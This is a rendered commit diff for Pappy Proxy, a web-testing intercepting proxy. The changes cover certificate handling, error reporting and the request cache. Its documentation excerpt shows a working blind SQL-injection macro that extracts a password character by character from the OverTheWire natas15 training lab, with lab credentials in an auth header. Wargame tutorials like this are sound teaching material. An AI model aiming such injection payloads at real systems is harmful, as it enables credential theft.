<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="c">###########</span>
<span class="c">## Requests</span>
<span class="c"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c"># as needed to create modified requests</span>
<span class="c">##</span>
<span class="c1">###########</span>
<span class="c1">## Requests</span>
<span class="c1"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c1"># as needed to create modified requests</span>
<span class="c1">##</span>
<span class="n">req1</span> <span class="o">=</span> <span class="n">Request</span><span class="p">((</span>
<span class="s">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;username=admin&#39;</span>
<span class="s1">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;username=admin&#39;</span>
<span class="p">))</span>
<span class="k">def</span> <span class="nf">check_char</span><span class="p">(</span><span class="n">char</span><span class="p">,</span> <span class="n">pos</span><span class="p">):</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s">&#39;natas16&quot; AND ASCII(SUBSTRING(password, </span><span class="si">%d</span><span class="s">, 1)) = </span><span class="si">%d</span><span class="s">; #&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">pos</span><span class="p">,</span> <span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">))</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;natas16&quot; AND ASCII(SUBSTRING(password, </span><span class="si">%d</span><span class="s1">, 1)) = </span><span class="si">%d</span><span class="s1">; #&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">pos</span><span class="p">,</span> <span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">))</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">req1</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">payload</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">payload</span>
<span class="n">r</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
<span class="k">if</span> <span class="s">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span>
<span class="k">if</span> <span class="s2">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">True</span>
<span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">valid_chars</span> <span class="o">=</span> <span class="s">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890&quot;</span>
<span class="n">password</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
<span class="n">valid_chars</span> <span class="o">=</span> <span class="s2">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890&quot;</span>
<span class="n">password</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="n">done</span> <span class="o">=</span> <span class="bp">False</span>
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
<span class="n">done</span> <span class="o">=</span> <span class="bp">True</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">valid_chars</span><span class="p">:</span>
<span class="c"># Print the current char to the current line</span>
<span class="c1"># Print the current char to the current line</span>
<span class="k">print</span> <span class="n">c</span><span class="p">,</span>
<span class="n">sys</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">flush</span><span class="p">()</span>
<span class="c"># Check the current char</span>
<span class="c1"># Check the current char</span>
<span class="k">if</span> <span class="n">check_char</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">password</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span>
<span class="c"># We got the correct char!</span>
<span class="c1"># We got the correct char!</span>
<span class="n">password</span> <span class="o">+=</span> <span class="n">c</span>
<span class="c"># Print it to the screen</span>
<span class="k">print</span> <span class="s">&#39;&#39;</span>
<span class="k">print</span> <span class="s">&#39;</span><span class="si">%s</span><span class="s"> is char </span><span class="si">%d</span><span class="s">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">password</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span> <span class="s">&#39;The password so far is </span><span class="si">%s</span><span class="s">&#39;</span> <span class="o">%</span> <span class="n">password</span>
<span class="c"># We have to do another round</span>
<span class="c1"># Print it to the screen</span>
<span class="k">print</span> <span class="s1">&#39;&#39;</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1"> is char </span><span class="si">%d</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">password</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;The password so far is </span><span class="si">%s</span><span class="s1">&#39;</span> <span class="o">%</span> <span class="n">password</span>
<span class="c1"># We have to do another round</span>
<span class="n">done</span> <span class="o">=</span> <span class="bp">False</span>
<span class="k">break</span>
<span class="k">if</span> <span class="n">done</span><span class="p">:</span>
<span class="c"># We got through the entire alphabet</span>
<span class="k">print</span> <span class="s">&#39;&#39;</span>
<span class="k">print</span> <span class="s">&#39;Done! The password is &quot;</span><span class="si">%s</span><span class="s">&quot;&#39;</span> <span class="o">%</span> <span class="n">password</span>
<span class="c1"># We got through the entire alphabet</span>
<span class="k">print</span> <span class="s1">&#39;&#39;</span>
<span class="k">print</span> <span class="s1">&#39;Done! The password is &quot;</span><span class="si">%s</span><span class="s1">&quot;&#39;</span> <span class="o">%</span> <span class="n">password</span>
<span class="k">break</span>
</pre></div>
</div>
<p>Then we run it:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; lma
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; lma
Loaded &quot;&lt;Macro Macro 41855887 (brute)&gt;&quot;
pappy&gt; rma brute
a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W
@ -893,12 +893,12 @@ pappy&gt;
<li class="right" >
<a href="overview.html" title="The Pappy Proxy"
>previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.3.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

2
pappyproxy/__init__.py
View file

@ -1 +1 @@
__version__ = '0.2.11'
__version__ = '0.2.12'

2
pappyproxy/comm.py
View file

@ -12,7 +12,7 @@ Handles creating a listening server bound to localhost that other processes can
use to interact with the proxy.
"""
debug = True
debug = False
class CommServer(LineReceiver):
MAX_LENGTH=sys.maxint

45
pappyproxy/http.py
View file

@ -1108,6 +1108,15 @@ class Request(HTTPMessage):
if self.unmangled:
retreq.unmangled = self.unmangled.copy()
return retreq
def duplicate(self):
retreq = self.copy()
retreq.reqid = self.reqid
if self.unmangled:
retreq.unmangled = self.unmangled.duplicate()
if self.response:
retreq.response = self.response.duplicate()
return retreq
@property
def rsptime(self):
@ -1907,8 +1916,9 @@ class Request(HTTPMessage):
if use_cache:
use_cache.evict(self.reqid)
Request.cache.ordered_ids.remove(self.reqid)
Request.cache.all_ids.remove(self.reqid)
if self.reqid in Request.cache.ordered_ids:
Request.cache.ordered_ids.remove(self.reqid)
if self.reqid in Request.cache.req_times:
del Request.cache.req_times[self.reqid]
if self.reqid in Request.cache.inmem_reqs:
@ -2143,16 +2153,17 @@ class Request(HTTPMessage):
if ret_unmangled:
if not r.unmangled:
raise PappyException("Request %s was not mangled"%r.reqid)
return r.unmangled
return r.unmangled.duplicate()
if rsp_unmangled:
if not r.response:
raise PappyException("Request %s does not have a response" % r.reqid)
if not r.response.unmangled:
raise PappyException("Response to request %s was not mangled" % r.reqid)
r.response = r.response.unmangled
return r
retreq = r.duplicate()
retreq.response = retreq.response.unmangled
return retreq
else:
return r
return r.duplicate()
# Get it through the cache
if use_cache and cache_to_use:
@ -2234,9 +2245,13 @@ class Request(HTTPMessage):
# Set up factory settings
factory.intercepting_macros = intercepting_macros
factory.connection_id = get_next_connection_id()
factory.connect()
new_req = yield factory.data_defer
request.response = new_req.response
try:
yield factory.connect()
new_req = yield factory.data_defer
request.response = new_req.response
except Exception as e:
request.response = None
raise e
defer.returnValue(request)
@defer.inlineCallbacks
@ -2271,9 +2286,14 @@ class Request(HTTPMessage):
Submits the request using its host, port, etc. and updates its response value
to the resulting response.
Cannot be called in async functions.
If an error is encountered while submitting the request, it is printed
to the console.
This is what you should use to submit your requests in macros.
"""
yield self.async_submit(mangle=mangle)
try:
yield self.async_submit(mangle=mangle)
except Exception as e:
print 'Submitting request to %s failed: %s' % (self.host, str(e))
class Response(HTTPMessage):
@ -2316,6 +2336,13 @@ class Response(HTTPMessage):
retrsp.unmangled = self.unmangled.copy()
return retrsp
def duplicate(self):
retrsp = self.copy()
retrsp.rspid = self.rspid
if self.unmangled:
retrsp.unmangled = self.unmangled.duplicate()
return retrsp
@property
def raw_headers(self):
"""

10
pappyproxy/plugins/filter.py
View file

@ -139,7 +139,7 @@ def scope_list(line):
"""
pappyproxy.context.print_scope()
@crochet.wait_for(timeout=None)
#@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def filter_prune(line):
"""
@ -155,11 +155,11 @@ def filter_prune(line):
# We copy so that we're not removing items from a set we're iterating over
act_reqs = yield pappyproxy.pappy.main_context.get_reqs()
inact_reqs = Request.cache.all_ids.difference(set(act_reqs))
inact_reqs = inact_reqs.difference(set(Request.cache.unmangled_ids))
inact_reqs = set(Request.cache.req_ids()).difference(set(act_reqs))
message = 'This will delete %d/%d requests. You can NOT undo this!! Continue?' % (len(inact_reqs), (len(inact_reqs) + len(act_reqs)))
if not confirm(message, 'n'):
defer.returnValue(None)
print message
# if not confirm(message, 'n'):
# defer.returnValue(None)
for reqid in inact_reqs:
try:

3
pappyproxy/plugins/vim_repeater/repeater.vim
View file

@ -3,6 +3,9 @@ if !has('python')
finish
endif
" Settings to make life easier
set hidden
let s:pyscript = resolve(expand('<sfile>:p:h') . '/repeater.py')
function! RepeaterAction(...)

101
pappyproxy/proxy.py
View file

@ -14,6 +14,7 @@ from twisted.internet import defer
from twisted.internet import reactor, ssl
from twisted.internet.protocol import ClientFactory, ServerFactory
from twisted.protocols.basic import LineReceiver
from twisted.python.failure import Failure
next_connection_id = 1
@ -86,23 +87,49 @@ def get_endpoint(target_host, target_port, target_ssl, socks_config=None, use_ht
tcp_endpoint = TCP4ClientEndpoint(reactor, sock_host, sock_port)
socks_endpoint = SOCKS5ClientEndpoint(target_host, target_port, tcp_endpoint, methods=methods)
if target_ssl:
endpoint = TLSWrapClientEndpoint(ClientTLSContext(), socks_endpoint)
endpoint = TLSWrapClientEndpoint(ssl.ClientContextFactory(), socks_endpoint)
else:
endpoint = socks_endpoint
else:
if target_ssl:
endpoint = SSL4ClientEndpoint(reactor, target_host, target_port,
ClientTLSContext())
ssl.ClientContextFactory())
else:
endpoint = TCP4ClientEndpoint(reactor, target_host, target_port)
return endpoint
def is_wildcardable_domain_name(domain):
"""
Guesses if this is a domain that can have a wildcard CN
"""
parts = domain.split('.')
if len(parts) <= 2:
# can't wildcard single names or root domains
return False
if len(parts) != 4:
return True
for part in parts:
try:
v = int(part)
if v < 0 or v > 255:
return True
except ValueError:
return True
return False
def get_wildcard_cn(domain):
"""
Returns a wildcard CN for the domain given
"""
top_parts = domain.split('.')[1:] # Wildcards the first subdomain
return '*.' + '.'.join(top_parts) # convert to *.example.com
def get_most_general_cn(domain):
if is_wildcardable_domain_name(domain):
return get_wildcard_cn(domain)
else:
return domain
class ClientTLSContext(ssl.ClientContextFactory):
isClient = 1
def getContext(self):
return SSL.Context(SSL.TLSv1_METHOD)
class ProxyClient(LineReceiver):
def __init__(self, request):
@ -113,6 +140,7 @@ class ProxyClient(LineReceiver):
self.data_defer = defer.Deferred()
self.completed = False
self.stream_response = True # used so child classes can temporarily turn off response streaming
self.data_received = False # we assume something's wrong until we get some data
self._response_obj = http.Response()
@ -143,6 +171,7 @@ class ProxyClient(LineReceiver):
self._response_obj.add_data(data)
def dataReceived(self, data):
self.data_received = True
if self.factory.stream_response and self.stream_response:
self.factory.return_transport.write(data)
LineReceiver.dataReceived(self, data)
@ -166,12 +195,37 @@ class ProxyClient(LineReceiver):
assert self._response_obj.full_response
self.data_defer.callback(self.request)
def respond_failure(self, message):
"""
Closes the connection to the remote server and returns an error message.
The request object will have a response of None.
"""
#self.transport.loseConnection()
self.data_defer.errback(PappyException(message))
def clientConnectionFailed(self, connector, reason):
self.log("Connection with remote server failed: %s" % reason)
def clientConnectionLost(self, connector, reason):
self.log("Connection with remote server lost: %s" % reason)
def _guess_failure_reason(self, failure):
message = failure.getErrorMessage()
try:
failure.raiseException()
except SSL.Error as e:
message = 'Error performing SSL handshake'
except Exception as e:
pass
return message
def connectionLost(self, reason):
self.log("Connection lost: %s" % reason)
if not self.data_received:
self.request.response = None
message = self._guess_failure_reason(reason)
self.respond_failure("Connection lost: %s" % message)
class UpstreamHTTPProxyClient(ProxyClient):
def __init__(self, request):
@ -240,7 +294,7 @@ class UpstreamHTTPProxyClient(ProxyClient):
self._sent = False
self.log("Starting TLS", verbosity_level=3)
self.transport.startTLS(ClientTLSContext())
self.transport.startTLS(ssl.ClientContextFactory())
self.log("TLS started", verbosity_level=3)
lines = self.request.full_message.splitlines()
for l in lines:
@ -284,6 +338,7 @@ class ProxyClientFactory(ClientFactory):
p.factory = self
self.log("Building protocol", verbosity_level=3)
p.data_defer.addCallback(self.return_request_pair)
p.data_defer.addErrback(self._data_defer_errback)
return p
def clientConnectionFailed(self, connector, reason):
@ -416,6 +471,9 @@ class ProxyClientFactory(ClientFactory):
yield endpoint.connect(self)
self.log("Connected")
def _data_defer_errback(self, message):
self.data_defer.errback(message)
class ProxyServerFactory(ServerFactory):
def __init__(self, save_all=False):
@ -479,15 +537,16 @@ class ProxyServer(LineReceiver):
host = self._request_obj.host
else:
host = cert_host
cn_host = get_most_general_cn(host)
if not host in cached_certs:
log("Generating cert for '%s'" % host,
log("Generating cert for '%s'" % cn_host,
verbosity_level=3)
(pkey, cert) = generate_cert(host,
(pkey, cert) = generate_cert(cn_host,
session.config.cert_dir)
cached_certs[host] = (pkey, cert)
cached_certs[cn_host] = (pkey, cert)
else:
log("Using cached cert for %s" % host, verbosity_level=3)
(pkey, cert) = cached_certs[host]
log("Using cached cert for %s" % cn_host, verbosity_level=3)
(pkey, cert) = cached_certs[cn_host]
ctx = ServerTLSContext(
private_key=pkey,
certificate=cert,
@ -537,6 +596,7 @@ class ProxyServer(LineReceiver):
stream_transport=return_transport)
if return_transport is None:
d.addCallback(self.send_response_back)
d.addErrback(self.send_error_back)
self._reset()
def _reset(self):
@ -568,6 +628,19 @@ class ProxyServer(LineReceiver):
self.transport.write(droppedrsp.full_message)
self.log("Response sent back, losing connection")
self.transport.loseConnection()
def send_error_back(self, failure):
errorrsp = http.Response(('HTTP/1.1 200 OK\r\n'
'Connection: close\r\n'
'Cache-control: no-cache\r\n'
'Pragma: no-cache\r\n'
'Cache-control: no-store\r\n'
'X-Frame-Options: DENY\r\n'
'Content-Length: %d\r\n\r\n'
'%s') % (len(str(failure.getErrorMessage())), str(failure.getErrorMessage())))
self.transport.write(errorrsp.full_message)
self.log("Error response sent back, losing connection")
self.transport.loseConnection()
def connectionMade(self):
if self.factory.force_ssl:

18
pappyproxy/requestcache.py
View file

@ -185,6 +185,24 @@ class RequestCache(object):
if count >= num and num != -1:
break
def req_ids(self, num=-1, ids=None, include_unmangled=False):
"""
Returns a list of IDs
"""
retids = []
over = list(self.ordered_ids)
for reqid in over:
if ids is not None and reqid not in ids:
continue
if not include_unmangled and reqid in self.unmangled_ids:
continue
if reqid in self.all_ids:
retids.append(reqid)
if len(retids) >= num and num != -1:
break
return retids
@defer.inlineCallbacks
def load_by_tag(self, tag):
reqs = yield pappyproxy.http.Request.load_requests_by_tag(tag, cust_cache=self, cust_dbpool=self.dbpool)

21
pappyproxy/tests/test_requestcache.py
View file

@ -110,3 +110,24 @@ def test_cache_inmem_evict():
assert reqs[1] in cache.inmem_reqs
assert reqs[2] in cache.inmem_reqs
assert reqs[3] in cache.inmem_reqs
def test_req_ids():
reqs = gen_reqs(5)
cache = RequestCache(3)
cache.add(reqs[0])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert cache.req_ids() == ['4', '3', '2', '1']
def test_req_ids_unmangled():
reqs = gen_reqs(5)
cache = RequestCache(3)
reqs[0].unmangled = reqs[4]
cache.add(reqs[0])
cache.add(reqs[4])
cache.add(reqs[1])
cache.add(reqs[2])
cache.add(reqs[3])
assert cache.req_ids() == ['4', '3', '2', '1']
assert cache.req_ids(include_unmangled=True) == ['4', '3', '2', '5', '1']

1
setup.py
View file

@ -25,6 +25,7 @@ setup(name='pappyproxy',
'beautifulsoup4>=4.4.1',
'cmd2>=0.6.8',
'crochet>=1.4.0',
'cryptography>=1.3.1',
'Jinja2>=2.8',
'lxml>=3.6.0',
'pygments>=2.0.2',